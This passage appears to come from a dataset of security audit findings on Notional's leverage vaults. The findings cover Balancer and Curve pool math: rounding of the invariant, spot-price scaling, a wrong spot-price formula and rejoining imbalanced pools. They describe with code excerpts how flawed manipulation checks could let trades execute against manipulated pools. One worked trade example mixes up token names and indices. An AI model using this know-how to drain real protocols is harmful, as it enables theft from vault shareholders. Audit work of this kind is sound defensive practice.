into the vault proportionally.\\n /// Unlocks the vault after restoration so that normal functionality is restored.\\n /// @param minPoolClaim slippage limit to prevent front running\\n function restoreVault(\\n uint256 minPoolClaim, bytes calldata /* data */\\n ) external override whenLocked onlyNotionalOwner {\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n\\n (IERC20[] memory tokens, /* */) = TOKENS();\\n uint256[] memory amounts = new uint256[](tokens.length);\\n\\n // All balances held by the vault are assumed to be used to re-enter\\n // the pool. 
Since the vault has been locked no other users should have\\n // been able to enter the pool.\\n for (uint256 i; i < tokens.length; i++) {\\n if (address(tokens[i]) == address(POOL_TOKEN())) continue;\\n amounts[i] = TokenUtils.tokenBalance(address(tokens[i]));\\n }\\n\\n // No trades are specified so this joins proportionally using the\\n // amounts specified.\\n uint256 poolTokens = _joinPoolAndStake(amounts, minPoolClaim);\\n..SNIP..\\n```\\n\\nThe main reason to join with all the pool's tokens in exact proportions is to minimize the price impact or slippage of the join. If the deposited tokens are imbalanced, they are often swapped internally within the pool, incurring slippage or fees.\\nHowever, the concept of proportional join to minimize slippage does not always hold with the current implementation of the `restoreVault` function.\\nProof-of-Concept\\nAt T0, assume that a pool is perfectly balanced (50%-50%) with 1000 WETH and 1000 stETH.\\nAt T1, an emergency exit is performed, the LP tokens are redeemed for the underlying pool tokens proportionally, and 100 WETH and 100 stETH are redeemed\\nAt T2, certain events happen or due to ongoing issues with the pool (e.g., attacks, bugs, mass withdrawal), the pool becomes imbalanced (30%-70%) with 540 WETH and 1260 stETH.\\nAt T3, the vault re-enters the withdrawn tokens to the pool proportionally with 100 WETH and 100 stETH. Since the pool is already imbalanced, attempting to enter the pool proportionally (50% WETH and 50% stETH) will incur additional slippage and penalties, resulting in fewer LP tokens returned.\\nThis issue affects both Curve and Balancer pools since joining an imbalanced pool will always incur a loss.\\nExplantation of imbalance pool\\nA Curve pool is considered imbalanced when there is an imbalance between the assets within it. 
For instance, the Curve stETH/ETH pool is considered imbalanced if it has the following reserves:\\nETH: 340,472.34 (31.70%)\\nstETH: 733,655.65 (68.30%)\\nIf a Curve Pool is imbalanced, attempting to perform a proportional join will not give an optimal return (e.g. result in fewer Pool LP tokens received).\\nIn Curve Pool, there are penalties/bonuses when depositing to a pool. The pools are always trying to balance themselves. If a deposit helps the pool to reach that desired balance, a deposit bonus will be given (receive extra tokens). On the other hand, if a deposit deviates from the pool from the desired balance, a deposit penalty will be applied (receive fewer tokens).\\n```\\ndef add_liquidity(amounts: uint256[N_COINS], min_mint_amount: uint256) -> uint256:\\n..SNIP..\\n if token_supply > 0:\\n # Only account for fees if we are not the first to deposit\\n fee: uint256 = self.fee * N_COINS / (4 * (N_COINS - 1))\\n admin_fee: uint256 = self.admin_fee\\n for i in range(N_COINS):\\n ideal_balance: uint256 = D1 * old_balances[i] / D0\\n difference: uint256 = 0\\n if ideal_balance > new_balances[i]:\\n difference = ideal_balance - new_balances[i]\\n else:\\n difference = new_balances[i] - ideal_balance\\n fees[i] = fee * difference / FEE_DENOMINATOR\\n if admin_fee != 0:\\n self.admin_balances[i] += fees[i] * admin_fee / FEE_DENOMINATOR\\n new_balances[i] -= fees[i]\\n D2 = self.get_D(new_balances, amp)\\n mint_amount = token_supply * (D2 - D0) / D0\\n else:\\n mint_amount = D1 # Take the dust if there was any\\n..SNIP..\\n```\\n\\nFollowing is the mathematical explanation of the penalties/bonuses extracted from Curve's Discord channel:\\nThere is a “natural” amount of D increase that corresponds to a given total deposit amount; when the pool is perfectly balanced, this D increase is optimally achieved by a balanced deposit. 
Any other deposit proportions for the same total amount will give you less D.\\nHowever, when the pool is imbalanced, a balanced deposit is no longer optimal for the D increase.","Consider providing the callers the option to deposit the reward tokens in a ""non-proportional"" manner if a pool becomes imbalanced. For instance, the function could allow the caller to swap the withdrawn tokens in external DEXs within the `restoreVault` function to achieve the most optimal proportion to minimize the penalty and slippage when re-entering the pool. This is similar to the approach in the vault's reinvest function.","There is no guarantee that a pool will always be balanced. Historically, there have been multiple instances where the largest curve pool (stETH/ETH) has become imbalanced (Reference #1 and #2).\\nIf the pool is imbalanced due to unexpected circumstances, performing a proportional deposit is not optimal, leading to the deposit resulting in fewer LP tokens than possible due to the deposit penalty or slippage due to internal swap.\\nThe side-effect is that the vault restoration will result in fewer pool tokens in return due to sub-optimal trade, eventually leading to a loss of assets for the vault shareholder.","```\\nFile: SingleSidedLPVaultBase.sol\\n /// @notice Restores withdrawn tokens from emergencyExit back into the vault proportionally.\\n /// Unlocks the vault after restoration so that normal functionality is restored.\\n /// @param minPoolClaim slippage limit to prevent front running\\n function restoreVault(\\n uint256 minPoolClaim, bytes calldata /* data */\\n ) external override whenLocked onlyNotionalOwner {\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n\\n (IERC20[] memory tokens, /* */) = TOKENS();\\n uint256[] memory amounts = new uint256[](tokens.length);\\n\\n // All balances held by the vault are assumed to be used to re-enter\\n // the pool. 
Since the vault has been locked no other users should have\\n // been able to enter the pool.\\n for (uint256 i; i < tokens.length; i++) {\\n if (address(tokens[i]) == address(POOL_TOKEN())) continue;\\n amounts[i] = TokenUtils.tokenBalance(address(tokens[i]));\\n }\\n\\n // No trades are specified so this joins proportionally using the\\n // amounts specified.\\n uint256 poolTokens = _joinPoolAndStake(amounts, minPoolClaim);\\n..SNIP..\\n```\\n" +Rounding differences when computing the invariant,high,"The invariant is used to compute the spot price to verify if the pool has been manipulated before executing certain key vault actions (e.g. reinvest rewards). If the inputted invariant is inaccurate, the spot price computed might not be accurate and might not match the actual spot price of the Balancer Pool. In the worst-case scenario, it might potentially fail to detect the pool has been manipulated, and the trade proceeds to execute against the manipulated pool, leading to a loss of assets.\\nThe Balancer's Composable Pool codebase relies on the old version of the `StableMath._calculateInvariant` that allows the caller to specify if the computation should round up or down via the `roundUp` parameter.\\n```\\nFile: StableMath.sol\\n function _calculateInvariant(\\n uint256 amplificationParameter,\\n uint256[] memory balances,\\n bool roundUp\\n ) internal pure returns (uint256) {\\n /**********************************************************************************************\\n // invariant //\\n // D = invariant D^(n+1) //\\n // A = amplification coefficient A n^n S + D = A D n^n + ----------- //\\n // S = sum of balances n^n P //\\n // P = product of balances //\\n // n = number of tokens //\\n *********x************************************************************************************/\\n\\n unchecked {\\n // We support rounding up or down.\\n uint256 sum = 0;\\n uint256 numTokens = balances.length;\\n for (uint256 i = 0; i < numTokens; i++) {\\n sum = 
sum.add(balances[i]);\\n }\\n if (sum == 0) {\\n return 0;\\n }\\n\\n uint256 prevInvariant = 0;\\n uint256 invariant = sum;\\n uint256 ampTimesTotal = amplificationParameter * numTokens;\\n\\n for (uint256 i = 0; i < 255; i++) {\\n uint256 P_D = balances[0] * numTokens;\\n for (uint256 j = 1; j < numTokens; j++) {\\n P_D = Math.div(Math.mul(Math.mul(P_D, balances[j]), numTokens), invariant, roundUp);\\n }\\n prevInvariant = invariant;\\n invariant = Math.div(\\n Math.mul(Math.mul(numTokens, invariant), invariant).add(\\n Math.div(Math.mul(Math.mul(ampTimesTotal, sum), P_D), _AMP_PRECISION, roundUp)\\n ),\\n Math.mul(numTokens + 1, invariant).add(\\n // No need to use checked arithmetic for the amp precision, the amp is guaranteed to be at least 1\\n Math.div(Math.mul(ampTimesTotal - _AMP_PRECISION, P_D), _AMP_PRECISION, !roundUp)\\n ),\\n roundUp\\n );\\n\\n if (invariant > prevInvariant) {\\n if (invariant - prevInvariant <= 1) {\\n return invariant;\\n }\\n } else if (prevInvariant - invariant <= 1) {\\n return invariant;\\n }\\n }\\n }\\n\\n revert CalculationDidNotConverge();\\n }\\n```\\n\\nWithin the `BalancerSpotPrice._calculateStableMathSpotPrice` function, the `StableMath._calculateInvariant` is computed rounding up per Line 90 below\\n```\\nFile: BalancerSpotPrice.sol\\n function _calculateStableMathSpotPrice(\\n uint256 ampParam,\\n uint256[] memory scalingFactors,\\n uint256[] memory balances,\\n uint256 scaledPrimary,\\n uint256 primaryIndex,\\n uint256 index2\\n ) internal pure returns (uint256 spotPrice) {\\n // Apply scale factors\\n uint256 secondary = balances[index2] * scalingFactors[index2] / BALANCER_PRECISION;\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n ampParam, StableMath._balances(scaledPrimary, secondary), true // round up\\n );\\n```\\n\\nThe new Composable Pool contract uses a newer version of the StableMath library where the `StableMath._calculateInvariant` function always rounds down. 
Following is the StableMath.sol of one of the popular composable pools in Arbitrum that uses the new StableMath library\\n```\\nfunction _calculateInvariant(uint256 amplificationParameter, uint256[] memory balances)\\n internal\\n pure\\n returns (uint256)\\n{\\n /**********************************************************************************************\\n // invariant //\\n // D = invariant D^(n+1) //\\n // A = amplification coefficient A n^n S + D = A D n^n + ----------- //\\n // S = sum of balances n^n P //\\n // P = product of balances //\\n // n = number of tokens //\\n **********************************************************************************************/\\n\\n // Always round down, to match Vyper's arithmetic (which always truncates).\\n ..SNIP..\\n```\\n\\nThus, Notional rounds up when calculating the invariant, while Balancer's Composable Pool rounds down when calculating the invariant. This inconsistency will result in a different invariant","To avoid any discrepancy in the result, ensure that the StableMath library used by Balancer's Composable Pool and Notional's leverage vault are aligned, and the implementation of the StableMath functions is the same between them.","The invariant is used to compute the spot price to verify if the pool has been manipulated before executing certain key vault actions (e.g. reinvest rewards). If the inputted invariant is inaccurate, the spot price computed might not be accurate and might not match the actual spot price of the Balancer Pool. 
In the worst-case scenario, it might potentially fail to detect the pool has been manipulated, and the trade proceeds to execute against the manipulated pool, leading to a loss of assets.","```\\nFile: StableMath.sol\\n function _calculateInvariant(\\n uint256 amplificationParameter,\\n uint256[] memory balances,\\n bool roundUp\\n ) internal pure returns (uint256) {\\n /**********************************************************************************************\\n // invariant //\\n // D = invariant D^(n+1) //\\n // A = amplification coefficient A n^n S + D = A D n^n + ----------- //\\n // S = sum of balances n^n P //\\n // P = product of balances //\\n // n = number of tokens //\\n *********x************************************************************************************/\\n\\n unchecked {\\n // We support rounding up or down.\\n uint256 sum = 0;\\n uint256 numTokens = balances.length;\\n for (uint256 i = 0; i < numTokens; i++) {\\n sum = sum.add(balances[i]);\\n }\\n if (sum == 0) {\\n return 0;\\n }\\n\\n uint256 prevInvariant = 0;\\n uint256 invariant = sum;\\n uint256 ampTimesTotal = amplificationParameter * numTokens;\\n\\n for (uint256 i = 0; i < 255; i++) {\\n uint256 P_D = balances[0] * numTokens;\\n for (uint256 j = 1; j < numTokens; j++) {\\n P_D = Math.div(Math.mul(Math.mul(P_D, balances[j]), numTokens), invariant, roundUp);\\n }\\n prevInvariant = invariant;\\n invariant = Math.div(\\n Math.mul(Math.mul(numTokens, invariant), invariant).add(\\n Math.div(Math.mul(Math.mul(ampTimesTotal, sum), P_D), _AMP_PRECISION, roundUp)\\n ),\\n Math.mul(numTokens + 1, invariant).add(\\n // No need to use checked arithmetic for the amp precision, the amp is guaranteed to be at least 1\\n Math.div(Math.mul(ampTimesTotal - _AMP_PRECISION, P_D), _AMP_PRECISION, !roundUp)\\n ),\\n roundUp\\n );\\n\\n if (invariant > prevInvariant) {\\n if (invariant - prevInvariant <= 1) {\\n return invariant;\\n }\\n } else if (prevInvariant - invariant <= 1) {\\n return 
invariant;\\n }\\n }\\n }\\n\\n revert CalculationDidNotConverge();\\n }\\n```\\n" +Incorrect scaling of the spot price,high,"The incorrect scaling of the spot price leads to the incorrect spot price, which is later compared with the oracle price.\\nIf the spot price is incorrect, it might potentially fail to detect the pool has been manipulated or result in unintended reverts due to false positives. In the worst-case scenario, the trade proceeds to execute against the manipulated pool, leading to a loss of assets.\\nPer the comment and source code at Lines 97 to 103, the `SPOT_PRICE.getComposableSpotPrices` is expected to return the spot price in native decimals.\\n```\\nFile: BalancerComposableAuraVault.sol\\n function _checkPriceAndCalculateValue() internal view override returns (uint256) {\\n (uint256[] memory balances, uint256[] memory spotPrices) = SPOT_PRICE.getComposableSpotPrices(\\n BALANCER_POOL_ID,\\n address(BALANCER_POOL_TOKEN),\\n PRIMARY_INDEX()\\n );\\n\\n // Spot prices are returned in native decimals, convert them all to POOL_PRECISION\\n // as required in the _calculateLPTokenValue method.\\n (/* */, uint8[] memory decimals) = TOKENS();\\n for (uint256 i; i < spotPrices.length; i++) {\\n spotPrices[i] = spotPrices[i] * POOL_PRECISION() / 10 ** decimals[i];\\n }\\n\\n return _calculateLPTokenValue(balances, spotPrices);\\n }\\n```\\n\\nWithin the `getComposableSpotPrices` function, it will trigger the `_calculateStableMathSpotPrice` function. 
When the primary and secondary balances are passed into the `StableMath._calculateInvariant` and `StableMath._calcSpotPrice` functions, they are scaled up to 18 decimals precision as StableMath functions only work with balances that have been normalized to 18 decimals.\\nAssuming that the following states:\\nPrimary Token = USDC (6 decimals)\\nSecondary Token = DAI (18 decimals)\\nPrimary Balance = 100 USDC (=100 * 1e6)\\nSecondary Balance = 100 DAI (=100 * 1e18)\\nscalingFactors[USDC] = 1e12 * Fixed.ONE (1e18) = 1e30\\nscalingFactors[DAI] = 1e0 * Fixed.ONE (1e18) = 1e18\\nThe price between USDC and DAI is 1:1\\nAfter scaling the primary and secondary balances, the scaled balances will be as follows:\\n```\\nscaledPrimary = balances[USDC] * scalingFactors[USDC] / BALANCER_PRECISION\\nscaledPrimary = 100 * 1e6 * 1e30 / 1e18\\nscaledPrimary = 100 * 1e18\\n\\nscaledSecondary = balances[DAI] * scalingFactors[DAI] / BALANCER_PRECISION\\nscaledSecondary = 100 * 1e18 * 1e18 / 1e18\\nscaledSecondary = 100 * 1e18\\n```\\n\\nThe spot price returned from the `StableMath._calcSpotPrice` function at Line 93 will be `1e18` (1:1).\\n```\\nFile: BalancerSpotPrice.sol\\n function _calculateStableMathSpotPrice(\\n uint256 ampParam,\\n uint256[] memory scalingFactors,\\n uint256[] memory balances,\\n uint256 scaledPrimary,\\n uint256 primaryIndex,\\n uint256 index2\\n ) internal pure returns (uint256 spotPrice) {\\n // Apply scale factors\\n uint256 secondary = balances[index2] * scalingFactors[index2] / BALANCER_PRECISION;\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n ampParam, StableMath._balances(scaledPrimary, secondary), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice(ampParam, invariant, scaledPrimary, secondary);\\n\\n // Remove scaling factors from spot price\\n spotPrice = spotPrice * scalingFactors[primaryIndex] / scalingFactors[index2];\\n }\\n```\\n\\nSubsequently, in Line 96 above, the code attempts to remove the scaling factor from the 
spot price (1e18).\\n```\\nspotPrice = spotPrice * scalingFactors[USDC] / scalingFactors[DAI];\\nspotPrice = 1e18 * 1e30 / 1e18\\nspotPrice = 1e30\\nspotPrice = 1e12 * 1e18\\n```\\n\\nThe `spotPrice[DAI-Secondary]` is not denominated in native precision after the scaling. The `SPOT_PRICE.getComposableSpotPrices` will return the following spot prices:\\n```\\nspotPrice[USDC-Primary] = 0\\nspotPrice[DAI-Secondary] = 1e12 * 1e18\\n```\\n\\nThe returned spot prices will be scaled to POOL_PRECISION (1e18). After the scaling, the spot price remains the same:\\n```\\nspotPrice[DAI-Secondary] = spotPrice[DAI-Secondary] * POOL_PRECISION / DAI_Decimal\\nspotPrice[DAI-Secondary] = 1e12 * 1e18 * 1e18 / 1e18\\nspotPrice[DAI-Secondary] = 1e12 * 1e18\\n```\\n\\nThe converted spot prices will be passed into the `_calculateLPTokenValue` function. Within the `_calculateLPTokenValue` function, the oracle price for DAI<>USDC will be `1e18`. From here, the `spotPrice[DAI-Secondary]` (1e12 * 1e18) is significantly different from the oracle price (1e18), which will cause the pool manipulation check to revert.\\n```\\nFile: BalancerComposableAuraVault.sol\\n function _checkPriceAndCalculateValue() internal view override returns (uint256) {\\n (uint256[] memory balances, uint256[] memory spotPrices) = SPOT_PRICE.getComposableSpotPrices(\\n BALANCER_POOL_ID,\\n address(BALANCER_POOL_TOKEN),\\n PRIMARY_INDEX()\\n );\\n\\n // Spot prices are returned in native decimals, convert them all to POOL_PRECISION\\n // as required in the _calculateLPTokenValue method.\\n (/* */, uint8[] memory decimals) = TOKENS();\\n for (uint256 i; i < spotPrices.length; i++) {\\n spotPrices[i] = spotPrices[i] * POOL_PRECISION() / 10 ** decimals[i];\\n }\\n\\n return _calculateLPTokenValue(balances, spotPrices);\\n }\\n```\\n","The spot price returned from `StableMath._calcSpotPrice` is denominated in 1e18 (POOL_PRECISION) since the inputted balances are normalized to 18 decimals. 
The scaling factors are used to normalize a balance to 18 decimals. By dividing or scaling down the spot price by the scaling factor, the native spot price will be returned.\\n```\\nspotPrice[DAI-Secondary] = spotPrice[DAI-Secondary] * Fixed.ONE / scalingFactors[DAI];\\nspotPrice = 1e18 * Fixed.ONE / (1e0 * Fixed.ONE)\\nspotPrice = 1e18 * 1e18 / (1e0 * 1e18)\\nspotPrice = 1e18\\n```\\n","The spot price is used to verify if the pool has been manipulated before executing certain key vault actions (e.g. reinvest rewards).\\nIf the spot price is incorrect, it might potentially result in the following:\\nFailure to detect the pool has been manipulated, resulting in the trade to execute against the manipulated pool, leading to a loss of assets.\\nUnintended reverts due to false positives, breaking core functionalities of the protocol that rely on the `_checkPriceAndCalculateValue` function.\\nThe affected `_checkPriceAndCalculateValue` function was found to be used within the following functions:\\n`reinvestReward` - If the `_checkPriceAndCalculateValue` function is malfunctioning or reverts unexpectedly, the protocol will not be able to reinvest, leading to a loss of value for the vault shareholders.\\n`convertStrategyToUnderlying` - This function is used by Notional V3 for the purpose of computing the collateral values and the account's health factor. If the `_checkPriceAndCalculateValue` function reverts unexpectedly due to an incorrect invariant/spot price, many of Notional's core functions will break. 
In addition, the collateral values and the account's health factor might be inflated if it fails to detect a manipulated pool due to incorrect invariant/spot price, potentially allowing the malicious actors to drain the main protocol.","```\\nFile: BalancerComposableAuraVault.sol\\n function _checkPriceAndCalculateValue() internal view override returns (uint256) {\\n (uint256[] memory balances, uint256[] memory spotPrices) = SPOT_PRICE.getComposableSpotPrices(\\n BALANCER_POOL_ID,\\n address(BALANCER_POOL_TOKEN),\\n PRIMARY_INDEX()\\n );\\n\\n // Spot prices are returned in native decimals, convert them all to POOL_PRECISION\\n // as required in the _calculateLPTokenValue method.\\n (/* */, uint8[] memory decimals) = TOKENS();\\n for (uint256 i; i < spotPrices.length; i++) {\\n spotPrices[i] = spotPrices[i] * POOL_PRECISION() / 10 ** decimals[i];\\n }\\n\\n return _calculateLPTokenValue(balances, spotPrices);\\n }\\n```\\n" +Incorrect Spot Price,high,"Multiple discrepancies between the implementation of Leverage Vault's `_calcSpotPrice` function and SDK were observed, which indicate that the computed spot price is incorrect.\\nIf the spot price is incorrect, it might potentially fail to detect the pool has been manipulated. 
In the worst-case scenario, the trade proceeds to execute against the manipulated pool, leading to a loss of assets.\\nThe `BalancerSpotPrice._calculateStableMathSpotPrice` function relies on the `StableMath._calcSpotPrice` to compute the spot price of two tokens.\\n```\\nFile: BalancerSpotPrice.sol\\n function _calculateStableMathSpotPrice(\\n..SNIP..\\n // Apply scale factors\\n uint256 secondary = balances[index2] * scalingFactors[index2] / BALANCER_PRECISION;\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n ampParam, StableMath._balances(scaledPrimary, secondary), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice(ampParam, invariant, scaledPrimary, secondary);\\n```\\n\\n```\\nFile: StableMath.sol\\n /**\\n * @dev Calculates the spot price of token Y in token X.\\n */\\n function _calcSpotPrice(\\n uint256 amplificationParameter,\\n uint256 invariant, \\n uint256 balanceX,\\n uint256 balanceY\\n ) internal pure returns (uint256) {\\n /**************************************************************************************************************\\n // //\\n // 2.a.x.y + a.y^2 + b.y //\\n // spot price Y/X = - dx/dy = ----------------------- //\\n // 2.a.x.y + a.x^2 + b.x //\\n // //\\n // n = 2 //\\n // a = amp param * n //\\n // b = D + a.(S - D) //\\n // D = invariant //\\n // S = sum of balances but x,y = 0 since x and y are the only tokens //\\n **************************************************************************************************************/\\n\\n unchecked {\\n uint256 a = (amplificationParameter * 2) / _AMP_PRECISION;\\n uint256 b = Math.mul(invariant, a).sub(invariant);\\n\\n uint256 axy2 = Math.mul(a * 2, balanceX).mulDown(balanceY); // n = 2\\n\\n // dx = a.x.y.2 + a.y^2 - b.y\\n uint256 derivativeX = axy2.add(Math.mul(a, balanceY).mulDown(balanceY)).sub(b.mulDown(balanceY));\\n\\n // dy = a.x.y.2 + a.x^2 - b.x\\n uint256 derivativeY = axy2.add(Math.mul(a, 
balanceX).mulDown(balanceX)).sub(b.mulDown(balanceX));\\n\\n // The rounding direction is irrelevant as we're about to introduce a much larger error when converting to log\\n // space. We use `divUp` as it prevents the result from being zero, which would make the logarithm revert. A\\n // result of zero is therefore only possible with zero balances, which are prevented via other means.\\n return derivativeX.divUp(derivativeY);\\n }\\n }\\n```\\n\\nOn a high level, the spot price is computed by determining the pool derivatives. The Balancer SDK's provide a feature to compute the spot price of any two tokens within a pool, and it leverages the `_poolDerivatives` function.\\nThe existing function for computing the spot price of any two tokens of a composable pool has the following errors or discrepancies from the approach used to compute the spot price in Balancer SDK, which might lead to an inaccurate spot price being computed.\\nInstance 1\\nThe comments and SDK add `b.y` and `b.x` to the numerator and denominator, respectively, in the formula. However, the code performs a subtraction.\\nInstance 2\\nPer the comment and SDK code, $b = (S - D) a + D$.\\nHowever, assuming that $S$ is zero (for a two-token pool), the following code in the Leverage Vault to compute $b$ is not equivalent to the above.\\n```\\nuint256 b = Math.mul(invariant, a).sub(invariant);\\n```\\n\\nInstance 3\\nThe $S$ in the code will always be zero because the code is catered only for two-token pools. However, for a composable pool, it can support up to five (5) tokens in a pool. $S$ should be as follows, where $balances$ is all the tokens in a composable pool except for BPT.\\n$$ S = \\sum_{i \\neq \\text{tokenIndexIn}, i \\neq \\text{tokenIndexOut}} \\text{balances}[i] $$\\nInstance 4\\nInstance 5\\nPer SDK, the amplification factor is scaled down by $n^{(n - 1)}$ where $n$ is the number of tokens in a composable pool (excluding BPT). 
Otherwise, this was not implemented within the code.","Given multiple discrepancies between the implementation of Leverage Vault's `_calcSpotPrice` function and SDK and due to the lack of information on the web, it is recommended to reach out to the Balancer's protocol team to identify the actual formula used to determine a spot price of any two tokens within a composable pool and check out if the formula in the SDK is up-to-date to be used against the composable pool.\\nIt is also recommended to implement additional tests to ensure that the `_calcSpotPrice` returns the correct spot price of composable pools.\\nIn addition, the `StableMath._calcSpotPrice` function is no longer used or found within the current version of Balancer's composable pool. Thus, there is no guarantee that the math within the `StableMath._calcSpotPrice` works with the current implementation. It is recommended to use the existing method in the current Composable Pool's StableMath, such as `_calcOutGivenIn` (ensure the fee is excluded) to compute the spot price.","The spot price is used to verify if the pool has been manipulated before executing certain key vault actions (e.g. reinvest rewards). If the spot price is incorrect, it might potentially fail to detect the pool has been manipulated or result in unintended reverts due to false positives. 
In the worst-case scenario, the trade proceeds to execute against the manipulated pool, leading to a loss of assets.","```\\nFile: BalancerSpotPrice.sol\\n function _calculateStableMathSpotPrice(\\n..SNIP..\\n // Apply scale factors\\n uint256 secondary = balances[index2] * scalingFactors[index2] / BALANCER_PRECISION;\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n ampParam, StableMath._balances(scaledPrimary, secondary), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice(ampParam, invariant, scaledPrimary, secondary);\\n```\\n" +Incorrect invariant used for Balancer's composable pools,high,"Only two balances instead of all balances were used when computing the invariant for Balancer's composable pools, which is incorrect. As a result, pool manipulation might not be detected. This could lead to the transaction being executed on the manipulated pool, resulting in a loss of assets.\\n```\\nFile: BalancerSpotPrice.sol\\n function _calculateStableMathSpotPrice(\\n..SNIP..\\n // Apply scale factors\\n uint256 secondary = balances[index2] * scalingFactors[index2] / BALANCER_PRECISION;\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n ampParam, StableMath._balances(scaledPrimary, secondary), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice(ampParam, invariant, scaledPrimary, secondary);\\n..SNIP..\\n```\\n\\nA composable pool can support up to 5 tokens (excluding the BPT). When computing the invariant for a composable pool, one needs to pass in the balances of all the tokens within the pool except for BPT. However, the existing code always only passes in the balance of two tokens, which will return an incorrect invariant if the composable pool supports more than two tokens.\\nFollowing is the formula for computing the invariant of a composable pool taken from Balancer's Composable Pool. 
The `balances` passed into this function consist of all `balances` except for BPT (Reference)\\n```\\nfunction _calculateInvariant(uint256 amplificationParameter, uint256[] memory balances)\\n internal\\n pure\\n returns (uint256)\\n{\\n /**********************************************************************************************\\n // invariant //\\n // D = invariant D^(n+1) //\\n // A = amplification coefficient A n^n S + D = A D n^n + ----------- //\\n // S = sum of balances n^n P //\\n // P = product of balances //\\n // n = number of tokens //\\n **********************************************************************************************/\\n```\\n\\nWithin the `_poolDerivatives` function, the `balances` used to compute the invariant consist of the balance of all tokens in the pool, except for BPT, which is aligned with the earlier understanding.\\n```\\nexport function _poolDerivatives(\\n A: BigNumber,\\n balances: OldBigNumber[],\\n tokenIndexIn: number,\\n tokenIndexOut: number,\\n is_first_derivative: boolean,\\n wrt_out: boolean\\n): OldBigNumber {\\n const totalCoins = balances.length;\\n const D = _invariant(A, balances);\\n```\\n","Review if there is any specific reason for passing in only the balance of two tokens when computing the invariant. Otherwise, the balance of all tokens (except BPT) should be used to compute the invariant.\\nIn addition, it is recommended to include additional tests to ensure that the computed spot price is aligned with the market price.","An incorrect invariant will lead to an incorrect spot price being computed. The spot price is used within the `_checkPriceAndCalculateValue` function that is intended to revert if the spot price on the pool is not within some deviation tolerance of the implied oracle price to prevent any pool manipulation. 
As a result, incorrect spot price leads to false positives or false negatives, where, in the worst-case scenario, pool manipulation was not caught by this function, and the transaction proceeded to be executed.\\nThe `_checkPriceAndCalculateValue` function was found to be used within the following functions:\\n`reinvestReward` - If the `_checkPriceAndCalculateValue` function is malfunctioning, it will cause the vault to add liquidity into a pool that has been manipulated, leading to a loss of assets.\\n`convertStrategyToUnderlying` - This function is used by Notional V3 for the purpose of computing the collateral values and the account's health factor. If the `_checkPriceAndCalculateValue` function reverts unexpectedly due to an incorrect invariant/spot price, many of Notional's core functions will break. In addition, the collateral values and the account's health factor might be inflated if it fails to detect a manipulated pool due to incorrect invariant/spot price, potentially allowing the malicious actors to drain the main protocol.","```\\nFile: BalancerSpotPrice.sol\\n function _calculateStableMathSpotPrice(\\n..SNIP..\\n // Apply scale factors\\n uint256 secondary = balances[index2] * scalingFactors[index2] / BALANCER_PRECISION;\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n ampParam, StableMath._balances(scaledPrimary, secondary), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice(ampParam, invariant, scaledPrimary, secondary);\\n..SNIP..\\n```\\n" +Unable to reinvest if the reward token equals one of the pool tokens,high,"If the reward token is the same as one of the pool tokens, the protocol would not be able to reinvest such a reward token. Thus leading to a loss of assets for the vault shareholders.\\nDuring the reinvestment process, the `reinvestReward` function will be executed once for each reward token. 
The length of the `trades` listing defined in the payload must be the same as the number of tokens in the pool per Line 339 below.\\n```\\nFile: SingleSidedLPVaultBase.sol\\n function reinvestReward(\\n SingleSidedRewardTradeParams[] calldata trades,\\n uint256 minPoolClaim\\n ) external whenNotLocked onlyRole(REWARD_REINVESTMENT_ROLE) returns (\\n address rewardToken,\\n uint256 amountSold,\\n uint256 poolClaimAmount\\n ) {\\n // Will revert if spot prices are not in line with the oracle values\\n _checkPriceAndCalculateValue();\\n\\n // Require one trade per token, if we do not want to buy any tokens at a\\n // given index then the amount should be set to zero. This applies to pool\\n // tokens like in the ComposableStablePool.\\n require(trades.length == NUM_TOKENS());\\n uint256[] memory amounts;\\n (rewardToken, amountSold, amounts) = _executeRewardTrades(trades);\\n```\\n\\nIn addition, due to the requirement at Line 105, each element in the `trades` listing must be a token within a pool and must be ordered in sequence according to the token index of the pool.\\n```\\nFile: StrategyUtils.sol\\n function executeRewardTrades(\\n IERC20[] memory tokens,\\n SingleSidedRewardTradeParams[] calldata trades,\\n address rewardToken,\\n address poolToken\\n ) external returns(uint256[] memory amounts, uint256 amountSold) {\\n amounts = new uint256[](trades.length);\\n for (uint256 i; i < trades.length; i++) {\\n // All trades must sell the same token.\\n require(trades[i].sellToken == rewardToken);\\n // Bypass certain invalid trades\\n if (trades[i].amount == 0) continue;\\n if (trades[i].buyToken == poolToken) continue;\\n\\n // The reward trade can only purchase tokens that go into the pool\\n require(trades[i].buyToken == address(tokens[i]));\\n```\\n\\nAssuming the TriCRV Curve pool (crvUSD+WETH+CRV) has two reward tokens (CRV & CVX). 
This example is taken from a live Curve pool on Ethereum (Reference 1 Reference 2)\\nThe pool will consist of the following tokens:\\n```\\ntokens[0] = crvUSD\\ntokens[1] = WETH\\ntokens[2] = CRV\\n```\\n\\nThus, if the protocol receives 3000 CVX reward tokens and it intends to sell 1000 CVX for crvUSD and 1000 CVX for WETH.\\nThe `trades` list has to be defined as below.\\n```\\ntrades[0].sellToken[0] = CRV (rewardToken) | trades[0].buyToken = crvUSD | trades[0].amount = 1000\\ntrades[1].sellToken[1] = CRV (rewardToken) | trades[1].buyToken = WETH | trades[0].amount = 1000\\ntrades[1].sellToken[2] = CRV (rewardToken) | trades[1].buyToken = CRV | trades[0].amount = 0\\n```\\n\\nThe same issue also affects the Balancer pools. Thus, the example is omitted for brevity. One of the affected Balancer pools is as follows, where the reward token is also one of the pool tokens.\\nWETH-AURA - Reference 1 Reference 2 (Reward Tokens = [BAL, AURA])\\nHowever, the issue is that the `_isInvalidRewardToken` function within the `_executeRewardTrades` will always revert.\\n```\\nFile: SingleSidedLPVaultBase.sol\\n function _executeRewardTrades(SingleSidedRewardTradeParams[] calldata trades) internal returns (\\n address rewardToken,\\n uint256 amountSold,\\n uint256[] memory amounts\\n ) {\\n // The sell token on all trades must be the same (checked inside executeRewardTrades) so\\n // just validate here that the 